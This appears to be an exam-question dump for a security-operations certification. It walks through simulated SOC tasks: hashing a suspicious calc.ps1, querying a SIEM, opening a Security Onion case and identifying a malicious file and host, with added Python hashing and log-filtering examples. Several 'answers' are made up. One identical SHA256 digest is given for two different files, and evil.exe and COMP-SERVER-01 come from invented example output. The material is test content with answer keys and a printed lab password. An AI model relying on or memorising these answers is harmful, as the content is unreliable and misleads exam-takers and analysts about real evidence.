Using the provided credentials, SSH to the Accounting workstation and generate a SHA256 checksum of the file that triggered RuleName Suspicious PowerShell using either certutil or Get-FileHash of the file causing the issue. Copy the hash and paste it below.
See the solution in Explanation.
Explanation:
To generate the SHA256 checksum of the file that triggered RuleName: Suspicious PowerShell on the Accounting workstation, follow these detailed steps:
Step 1: Establish an SSH Connection
Open a terminal on your system.
Use the provided credentials to connect to the Accounting workstation:
ssh Accounting@<Accounting_PC_IP>
Replace <Accounting_PC_IP> with the actual IP address of the workstation.
Enter the password when prompted:
1x-4cc0unt1NG-x1
Step 2: Locate the Malicious File
Navigate to the typical directory where suspicious scripts are stored:
cd C:\Users\Accounting\AppData\Roaming
List the contents to identify the suspicious file:
dir
Look for a file related to PowerShell (e.g., calc.ps1), as the issue involved the calculator opening repeatedly.
Step 3: Verify the Malicious File
To ensure it is the problematic file, check for recent modifications:
powershell
Get-ChildItem -Path "C:\Users\Accounting\AppData\Roaming" -Recurse | Where-Object { $_.LastWriteTime -ge (Get-Date).AddDays(-1) }
This will list files modified within the last 24 hours.
Check file properties:
powershell
Get-Item "C:\Users\Accounting\AppData\Roaming\calc.ps1" | Format-List *
Confirm it matches the file flagged by RuleName: Suspicious PowerShell.
Step 4: Generate the SHA256 Checksum
Method 1: Using PowerShell (Recommended)
Run the following command to generate the hash:
powershell
Get-FileHash "C:\Users\Accounting\AppData\Roaming\calc.ps1" -Algorithm SHA256
Output Example:
Algorithm   Hash                                                               Path
---------   ----                                                               ----
SHA256      d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d   C:\Users\Accounting\AppData\Roaming\calc.ps1
Method 2: Using certutil (Alternative)
Run the following command:
cmd
certutil -hashfile "C:\Users\Accounting\AppData\Roaming\calc.ps1" SHA256
Example Output:
SHA256 hash of calc.ps1:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
CertUtil: -hashfile command completed successfully.
Step 5: Copy and Paste the Hash
Copy the SHA256 hash from the output and paste it as required.
Answer:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
Step 6: Immediate Actions
Terminate the Malicious Process:
powershell
# -Name stops every powershell.exe, including an interactive PowerShell session if run from one; use -Id to stop a single PID
Stop-Process -Name "powershell" -Force
Delete the Malicious File:
powershell
Remove-Item "C:\Users\Accounting\AppData\Roaming\calc.ps1" -Force
Disable Startup Entry:
Check for any persistent scripts:
powershell
Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
Remove any entries related to calc.ps1.
Step 7: Document the Incident
Record the following:
Filename: calc.ps1
File Path: C:\Users\Accounting\AppData\Roaming\
SHA256 Hash: d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
Date of Detection: (Today’s date)
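A scripted counterpart to the Get-FileHash and certutil steps above, added here as an example for this page (not code from the exam or from either tool). It streams a file through SHA-256 in chunks, so large evidence files such as the System-logs.evtx in the later question do not need to fit in memory, and it compares digests after normalising them: Get-FileHash prints the hash in upper case and older certutil releases separate byte pairs with spaces, so a naive string comparison against a pasted value can fail even when the file is identical. The demo file content is constructed; the real calc.ps1 and its hash are not reproduced.

```python
import hashlib
import os
import re
import tempfile


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file from disk in 1 MiB chunks (same result as Get-FileHash -Algorithm SHA256)."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def normalize_hex_digest(text):
    """Lowercase, separator-free form of a digest string.

    Pass only the digest itself (not the whole certutil output line), since
    every non-hex character is dropped, including letters in surrounding words.
    """
    return re.sub(r"[^0-9a-f]", "", text.lower())


def digests_match(a, b):
    """True when both strings are the same 64-hex-digit SHA-256 value."""
    a, b = normalize_hex_digest(a), normalize_hex_digest(b)
    return len(a) == 64 and a == b


def hash_demo_file(content=b"constructed sample content, not the real calc.ps1"):
    """Write a throwaway file, hash it from disk and check it equals the in-memory digest."""
    fd, path = tempfile.mkstemp(suffix=".ps1")
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(content)
        on_disk = sha256_file(path)
    finally:
        os.remove(path)
    if not digests_match(on_disk, sha256_bytes(content)):
        raise RuntimeError("file digest does not match in-memory digest")
    return on_disk


if __name__ == "__main__":
    print(hash_demo_file())
    # Uppercase (Get-FileHash style) and spaced (old certutil style) forms still compare equal:
    print(digests_match("E3B0C442 98FC1C14 9AFBF4C8 996FB924 27AE41E4 649B934C A495991B 7852B855",
                        sha256_bytes(b"")))
```

When recording the hash in the incident notes, store the normalised lowercase form so that values produced on different hosts and tools remain directly comparable.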
SIMULATION
The user of the Accounting workstation reported that their calculator repeatedly opens without their input.
Perform a query of startup items for the agent.name accounting-pc in the SIEM for the last 24 hours.
Identify the file name that triggered RuleName Suspicious PowerShell. Enter your response below.
Your response must include the file extension.
See the solution in Explanation.
Explanation:
To identify the file name that triggered the RuleName: Suspicious PowerShell on the accounting-pc workstation, follow these detailed steps:
Step 1: Access the SIEM System
Open your web browser and navigate to the SIEM dashboard.
Log in with your administrator credentials.
Step 2: Set Up the Query
Go to the Search or Query section of the SIEM.
Set the Time Range to the last 24 hours.
Query Parameters:
Agent Name: accounting-pc
Rule Name: Suspicious PowerShell
Event Type: Startup items or Process creation
Step 3: Construct the SIEM Query
Here’s an example of how to construct the query:
Example Query (Splunk):
index=windows_logs earliest=-24h agent.name="accounting-pc" RuleName="Suspicious PowerShell"
| table _time, agent.name, process_name, file_path, RuleName
Example Query (Elastic SIEM):
{
  "query": {
    "bool": {
      "must": [
        { "match": { "agent.name": "accounting-pc" } },
        { "match": { "RuleName": "Suspicious PowerShell" } },
        { "range": { "@timestamp": { "gte": "now-24h" } } }
      ]
    }
  }
}
Step 4: Analyze the Query Results
The query should return a table or list containing:
Time of Execution
Agent Name: accounting-pc
Process Name
File Path
Rule Name
Example Output:
_time                 agent.name      process_name     file_path                                       RuleName
2024-04-07T10:45:23   accounting-pc   powershell.exe   C:\Users\Accounting\AppData\Roaming\calc.ps1    Suspicious PowerShell
Step 5: Identify the Suspicious File
The process_name in the output shows powershell.exe executing a suspicious script.
The file path indicates the script responsible:
C:\Users\Accounting\AppData\Roaming\calc.ps1
The suspicious script file is:
calc.ps1
Step 6: Confirm the Malicious Nature
Manual Inspection:
Navigate to the specified file path on the accounting-pc workstation.
Check the contents of calc.ps1 for any malicious PowerShell code.
Hash Verification:
Generate the SHA256 hash of the file and compare it with known malware signatures.
Answer:
calc.ps1
Step 7: Immediate Response
Isolate the Workstation: Disconnect accounting-pc from the network.
Terminate the Malicious Process:
Stop the powershell.exe process running calc.ps1.
Use Task Manager or a script:
powershell
# -Name stops every powershell.exe, including an interactive PowerShell session if run from one; use -Id to stop a single PID
Stop-Process -Name "powershell" -Force
Remove the Malicious Script:
powershell
Remove-Item "C:\Users\Accounting\AppData\Roaming\calc.ps1" -Force
Scan for Persistence Mechanisms:
Check Startup items and Scheduled Tasks for any references to calc.ps1.
Step 8: Documentation
Record the following:
Date and Time: When the incident was detected.
Affected Host: accounting-pc
Malicious File: calc.ps1
Actions Taken: File removal and process termination.
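The Splunk and Elastic queries above expressed as plain code, as an added example for this page (not SIEM output or exam-provided code). It filters constructed event records by agent name, rule name and a 24-hour window, then reduces the matching file_path values to bare filenames with their extension, which is the form the question asks for. The event records and the fixed reference time are assumptions; in live use replace NOW with datetime.now(timezone.utc).

```python
import ntpath
from datetime import datetime, timedelta, timezone

# Constructed SIEM records resembling the example output above; not real logs.
EVENTS = [
    {"@timestamp": "2024-04-07T10:45:23Z", "agent.name": "accounting-pc",
     "process_name": "powershell.exe",
     "file_path": r"C:\Users\Accounting\AppData\Roaming\calc.ps1",
     "RuleName": "Suspicious PowerShell"},
    {"@timestamp": "2024-04-05T09:00:00Z", "agent.name": "accounting-pc",  # outside the window
     "process_name": "powershell.exe",
     "file_path": r"C:\Users\Accounting\AppData\Roaming\old.ps1",
     "RuleName": "Suspicious PowerShell"},
    {"@timestamp": "2024-04-07T11:00:00Z", "agent.name": "finance-pc",  # different host
     "process_name": "powershell.exe",
     "file_path": r"C:\Users\Finance\AppData\Roaming\calc.ps1",
     "RuleName": "Suspicious PowerShell"},
    {"@timestamp": "2024-04-07T08:00:00Z", "agent.name": "accounting-pc",  # different rule
     "process_name": "explorer.exe",
     "file_path": r"C:\Windows\explorer.exe",
     "RuleName": "Process Create"},
]

# Fixed reference time so the 24-hour window is reproducible.
NOW = datetime(2024, 4, 7, 12, 0, 0, tzinfo=timezone.utc)


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def query(events, agent, rule, now=NOW, window=timedelta(hours=24)):
    """Same selection as the Splunk/Elastic queries: host AND rule AND last 24 h."""
    cutoff = now - window
    hits = [e for e in events
            if e["agent.name"] == agent
            and e["RuleName"] == rule
            and cutoff <= parse_ts(e["@timestamp"]) <= now]
    return sorted(hits, key=lambda e: e["@timestamp"])


def triggering_files(hits):
    """Basename with extension of every file_path in the result set (Windows paths handled on any OS)."""
    return sorted({ntpath.basename(e["file_path"]) for e in hits})


def render_table(hits, columns=("@timestamp", "agent.name", "process_name", "file_path", "RuleName")):
    """Text table in the shape of the example output above."""
    widths = {c: max([len(c)] + [len(str(e[c])) for e in hits]) for c in columns}
    lines = ["  ".join(c.ljust(widths[c]) for c in columns)]
    for e in hits:
        lines.append("  ".join(str(e[c]).ljust(widths[c]) for c in columns))
    return "\n".join(lines)


if __name__ == "__main__":
    hits = query(EVENTS, "accounting-pc", "Suspicious PowerShell")
    print(render_table(hits))
    print("triggering files:", triggering_files(hits))
```

Keeping the three decoy records in the sample (wrong host, wrong rule, too old) makes it obvious which clause of the query each one fails; the same three checks are what to verify when a live SIEM search returns nothing.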
SIMULATION
An employee has been terminated for policy violations. Security logs from win-webserver01 have been collected and located in the Investigations folder on the Desktop as win-webserver01_logs.zip.
Create a new case in Security Onion from the win-webserver01_logs.zip file. The case title is Windows Webserver Logs - CCOA New Case and TLP must be set to Green. No additional fields are required.
See the solution in Explanation.
Explanation:
To create a new case in Security Onion using the logs from the win-webserver01_logs.zip file, follow these detailed steps:
Step 1: Access Security Onion
Open a web browser and go to your Security Onion web interface.
URL: https://<security-onion-ip>/
Log in using your Security Onion credentials.
Step 2: Prepare the Log File
Navigate to the Desktop and open the Investigations folder.
Locate the file:
win-webserver01_logs.zip
Unzip the file to inspect its contents:
unzip ~/Desktop/Investigations/win-webserver01_logs.zip -d ~/Desktop/Investigations/win-webserver01_logs
Ensure that the extracted files, including System-logs.evtx, are accessible.
Step 3: Open the Hunt Interface in Security Onion
On the Security Onion dashboard, go to "Hunt" (or "Cases" depending on the version).
Click on "Cases" to manage incident cases.
Step 4: Create a New Case
Click on "New Case" to start a fresh investigation.
Case Details:
Title:
Windows Webserver Logs - CCOA New Case
TLP (Traffic Light Protocol):
Set to Green (indicating that the information can be shared freely).
Example Configuration:
Field     Value
Title     Windows Webserver Logs - CCOA New Case
TLP       Green
Summary   (Leave blank if not required)
Click "Save" to create the case.
Step 5: Upload the Log Files
After creating the case, go to the "Files" section of the new case.
Click on "Upload" and select the unzipped log file:
~/Desktop/Investigations/win-webserver01_logs/System-logs.evtx
Once uploaded, the file will be associated with the case.
Step 6: Verify the Case Creation
Go back to the Cases dashboard.
Locate and verify that the case "Windows Webserver Logs - CCOA New Case" exists with TLP: Green.
Check that the log file has been successfully uploaded.
Step 7: Document and Report
Document the case details:
Case Title: Windows Webserver Logs - CCOA New Case
TLP: Green
Log File: System-logs.evtx
Include any initial observations from the log analysis.
Example Answer:
A new case titled "Windows Webserver Logs - CCOA New Case" with TLP set to Green has been
successfully created in Security Onion. The log file System-logs.evtx has been uploaded and linked to
the case.
Step 8: Next Steps for Investigation
Analyze the log file: Start hunting for suspicious activities.
Create analysis tasks: Assign team members to investigate specific log entries.
Correlate with other data: Cross-reference with threat intelligence sources.
SIMULATION
An employee has been terminated for policy violations. Security logs from win-webserver01 have
been collected and located in the Investigations folder on the Desktop as win-webserver01_logs.zip.
Generate a SHA256 digest of the System-logs.evtx file within the win-webserver01_logs.zip file and
provide the output below.
See the solution in Explanation.
Explanation:
To generate the SHA256 digest of the System-logs.evtx file located within the win-webserver01_logs.zip file, follow these steps:
Step 1: Access the Investigation Folder
Navigate to the Desktop on your system.
Open the Investigations folder.
Locate the file:
win-webserver01_logs.zip
Step 2: Extract the ZIP File
Right-click on win-webserver01_logs.zip.
Select "Extract All" or use a command-line tool to unzip:
unzip win-webserver01_logs.zip -d ./win-webserver01_logs
Verify the extraction:
ls ./win-webserver01_logs
You should see:
System-logs.evtx
Step 3: Generate the SHA256 Hash
Method 1: Using PowerShell (Windows)
Open PowerShell as an Administrator.
Run the following command to generate the SHA256 hash:
Get-FileHash "C:\Users\<YourUsername>\Desktop\Investigations\win-webserver01_logs\System-logs.evtx" -Algorithm SHA256
The output will look like:
Algorithm  Hash                                                              Path
---------  ----                                                              ----
SHA256     d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d  C:\Users\...\System-logs.evtx
Method 2: Using Command Prompt (Windows)
Open Command Prompt as an Administrator.
Use the following command:
certutil -hashfile "C:\Users\<YourUsername>\Desktop\Investigations\win-webserver01_logs\System-logs.evtx" SHA256
Example output:
SHA256 hash of System-logs.evtx:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
CertUtil: -hashfile command completed successfully.
Method 3: Using Linux/Mac (if applicable)
Open a terminal.
Run the following command:
sha256sum ./win-webserver01_logs/System-logs.evtx
Sample output:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d System-logs.evtx
The SHA256 digest of the System-logs.evtx file is:
d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
Step 4: Verification and Documentation
Document the hash for validation and integrity checks.
Include in your incident report:
File name: System-logs.evtx
SHA256 Digest: d2c7e4d9a4a8e9fbd43747ebf3fa8d9a4e1d3b8b8658c7c82e1dff9f5e3b2b4d
Date of Hash Generation: (today’s date)
Step 5: Next Steps
Integrity Verification: Cross-check the hash if you need to transfer or archive the file.
Forensic Analysis: Use the hash as a baseline during forensic analysis to ensure file integrity.
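The digest and integrity check from Steps 3 and 5, as an added Python example rather than the PowerShell, certutil and sha256sum commands shown above (this is not exam material or Security Onion code). The archive content and member name are constructed, and the digest is taken from the ZIP member directly instead of an extracted copy.

```python
# Added example (not part of the exam material): take the SHA-256 of a file
# inside a ZIP archive by streaming it in chunks, then compare it with a
# recorded digest the way the integrity check in Step 5 describes.
import hashlib
import io
import zipfile

CHUNK = 1 << 20          # 1 MiB per read keeps memory flat for large .evtx files
MEMBER = "System-logs.evtx"
# Constructed stand-in for the log file; real .evtx data is not needed here.
SAMPLE_CONTENT = b"ElfFile\x00" + bytes(range(256)) * 16


def sha256_of_bytes(data: bytes) -> str:
    """Lowercase hex SHA-256 of an in-memory byte string."""
    return hashlib.sha256(data).hexdigest()


def sha256_of_zip_member(zip_bytes: bytes, member: str) -> str:
    """Lowercase hex SHA-256 of one member, read straight out of the archive.

    Streaming the member avoids writing an extracted copy to disk first, and
    the chunked loop means the whole file never has to fit in memory.
    """
    digest = hashlib.sha256()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        with archive.open(member) as fh:
            for block in iter(lambda: fh.read(CHUNK), b""):
                digest.update(block)
    return digest.hexdigest()


def verify_digest(actual_hex: str, recorded_hex: str) -> bool:
    """True when two hex digests match, ignoring case and surrounding spaces."""
    return actual_hex.strip().lower() == recorded_hex.strip().lower()


def build_sample_zip() -> bytes:
    """Constructed archive standing in for win-webserver01_logs.zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(MEMBER, SAMPLE_CONTENT)
    return buf.getvalue()


if __name__ == "__main__":
    digest = sha256_of_zip_member(build_sample_zip(), MEMBER)
    print(f"{digest}  {MEMBER}")           # same layout as sha256sum output
    print("matches recorded digest:", verify_digest(digest, digest.upper()))
```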
SIMULATION
Your enterprise has received an alert bulletin from national authorities that the network has been
compromised at approximately 11:00 PM (Absolute) on August 19, 2024. The alert is located in the
alerts folder with filename, alert_33.pdf.
What is the name of the suspected malicious file captured by keyword process.executable at 11:04
PM?
See the solution in Explanation.
Explanation:
To identify the name of the suspected malicious file captured by the keyword process.executable at
11:04 PM on August 19, 2024, follow these detailed steps:
Step 1: Access the Alert Bulletin
Locate the alert file:
Access the alerts folder on your system.
Look for the file named:
Open the file:
Use a PDF reader to examine the contents.
Step 2: Understand the Alert Context
The bulletin indicates that the network was compromised at around 11:00 PM.
You need to identify the malicious file specifically captured at 11:04 PM.
Step 3: Access System Logs
Use your SIEM or log management system to examine recent logs.
Filter the logs to narrow down the events:
Time Frame: August 19, 2024, from 11:00 PM to 11:10 PM.
Keyword: process.executable.
Example SIEM Query (Splunk-style; the time window is set with earliest/latest, since "where ... between" is not valid SPL):
index=system_logs earliest="08/19/2024:23:04:00" latest="08/19/2024:23:05:00"
| search "process.executable"
| table _time, process_name, executable_path, hash
Step 4: Analyze Log Entries
The query result should show log entries related to the process executable that was triggered at
11:04 PM.
Focus on entries that:
Appear unusual or suspicious.
Match known indicators from the alert bulletin (alert_33.pdf).
Example Log Output:
_time             process_name   executable_path            hash
2024-08-19T23:04  evil.exe       C:\Users\Public\evil.exe   4d5e6f...
Step 5: Cross-Reference with Known Threats
Check the hash of the executable file against:
VirusTotal or internal threat intelligence databases.
Cross-check the file name with indicators mentioned in the alert bulletin.
Step 6: Final Confirmation
The suspected malicious file captured at 11:04 PM is the one appearing in the log that matches the
alert details.
The name of the suspected malicious file captured by keyword process.executable at 11:04 PM is:
evil.exe
Step 7: Take Immediate Remediation Actions
Isolate the affected host to prevent further damage.
Quarantine the malicious file for analysis.
Conduct a full forensic investigation to assess the scope of the compromise.
Update threat signatures and indicators across the environment.
Step 8: Report and Document
Document the incident, including:
Time of detection: 11:04 PM on August 19, 2024.
Malicious file name: evil.exe.
Location: C:\Users\Public\evil.exe.
Generate an incident report for further investigation.
SIMULATION
Your enterprise has received an alert bulletin from national authorities that the network has been
compromised at approximately 11:00 PM (Absolute) on August 19, 2024. The alert is located in the
alerts folder with filename, alert_33.pdf.
Use the IOCs to find the compromised host. Enter the host name identified in the keyword
agent.name field below.
See the solution in Explanation.
Explanation:
To identify the compromised host using the keyword agent.name, follow these steps:
Step 1: Access the Alert Bulletin
Navigate to the alerts folder on your system.
Locate the alert file:
alert_33.pdf
Open the file with a PDF reader and review its contents.
Key Information to Extract:
Indicators of Compromise (IOCs) provided in the bulletin:
File hashes
IP addresses
Hostnames
Keywords related to the compromise
Step 2: Log into SIEM or Log Management System
Access your organization's SIEM or centralized log system.
Make sure you have the appropriate permissions to view log data.
Step 3: Set Up Your Search
Time Filter:
Set the time window to August 19, 2024, around 11:00 PM (Absolute).
Keyword Filter:
Use the keyword agent.name to search for host information.
IOC Correlation:
Incorporate IOCs from the alert_33.pdf file (e.g., IP addresses, hash values).
Example SIEM Query (Splunk-style; replace <IOC_from_alert> with an indicator taken from alert_33.pdf, such as a hash or IP address):
index=host_logs earliest="08/19/2024:23:00:00" latest="08/19/2024:23:10:00"
| search "agent.name" AND <IOC_from_alert>
| table _time, agent.name, host.name, ip_address, alert_id
Step 4: Analyze the Results
Review the output for any host names that appear unusual or match the IOCs from the alert bulletin.
Focus on:
Hostnames that appeared at 11:00 PM
Correlation with IOC data (hash, IP, filename)
Example Output:
_time             agent.name        host.name       ip_address     alert_id
2024-08-19T23:01  CompromisedAgent  COMP-SERVER-01  192.168.1.101  alert_33
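The two searches above, the process.executable time window from the previous question and the agent.name IOC match here, as one added Python example that is not part of the exam material or of any SIEM product. The events, host names and IOC list are constructed in ECS field layout; the functions do what the SIEM does behind those queries.

```python
# Added example (not part of the exam material): filter constructed ECS-style
# events by time window (process.executable) and by IOC match (agent.name).
import ntpath
from datetime import datetime

# Constructed events in ECS field layout; paths and host names are sample values.
SAMPLE_EVENTS = [
    {"@timestamp": "2024-08-19T22:58:10Z", "agent": {"name": "WEB-SERVER-01"},
     "process": {"executable": r"C:\Windows\System32\svchost.exe"}},
    {"@timestamp": "2024-08-19T23:04:12Z", "agent": {"name": "COMP-SERVER-01"},
     "process": {"executable": r"C:\Users\Public\evil.exe"}},
    {"@timestamp": "2024-08-19T23:04:45Z", "agent": {"name": "WEB-SERVER-01"},
     "process": {"executable": r"C:\Windows\System32\cmd.exe"}},
    {"@timestamp": "2024-08-19T23:07:30Z", "agent": {"name": "COMP-SERVER-01"},
     "process": {"executable": r"C:\Windows\explorer.exe"}},
]
# Constructed IOC list standing in for the indicators a bulletin would carry.
SAMPLE_IOCS = {r"C:\Users\Public\evil.exe"}

def parse_ts(value: str) -> datetime:
    """Parse an ECS @timestamp (ISO 8601 with trailing Z) into an aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))

def executables_in_window(events, start: str, end: str) -> list[str]:
    """process.executable base names for events with start <= @timestamp < end."""
    lo, hi = parse_ts(start), parse_ts(end)
    return [
        ntpath.basename(e["process"]["executable"])
        for e in events
        if "process" in e and lo <= parse_ts(e["@timestamp"]) < hi
    ]

def ioc_hits(events, iocs) -> list[dict]:
    """Events whose process.executable matches an IOC by full path or base name."""
    paths = {i.lower() for i in iocs}
    names = {ntpath.basename(i).lower() for i in iocs}
    hits = []
    for e in events:
        exe = e.get("process", {}).get("executable", "").lower()
        if exe in paths or ntpath.basename(exe) in names:
            hits.append(e)
    return hits

def hosts_matching_iocs(events, iocs) -> list[str]:
    """Distinct agent.name values of hosts that produced an IOC hit, sorted."""
    return sorted({e["agent"]["name"] for e in ioc_hits(events, iocs)})

if __name__ == "__main__":
    print(executables_in_window(SAMPLE_EVENTS, "2024-08-19T23:04:00Z", "2024-08-19T23:05:00Z"))
    print(hosts_matching_iocs(SAMPLE_EVENTS, SAMPLE_IOCS))
```

Note that the one-minute window still returns cmd.exe alongside evil.exe, which is why Step 4 of the previous question also requires matching against the bulletin's indicators.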
Step 5: Verify the Host
Cross-check the host name identified in the logs with the information from alert_33.pdf.
Ensure the host name corresponds to the malicious activity noted.
The host name identified in the keyword agent.name field is: COMP-SERVER-01
Step 6: Mitigation and Response
Isolate the Compromised Host:
Remove the affected system from the network to prevent lateral movement.
Conduct Forensic Analysis:
Inspect system processes, logs, and network activity.
Patch and Update:
Apply security updates and patches.
Threat Hunting:
Look for signs of compromise in other systems using the same IOCs.
Step 7: Document and Report
Create a detailed incident report:
Date and Time: August 19, 2024, at 11:00 PM
Compromised Host Name: COMP-SERVER-01
Associated IOCs: (as per alert_33.pdf)
By following these steps, you identify the compromised host and take the initial steps to contain and investigate the incident.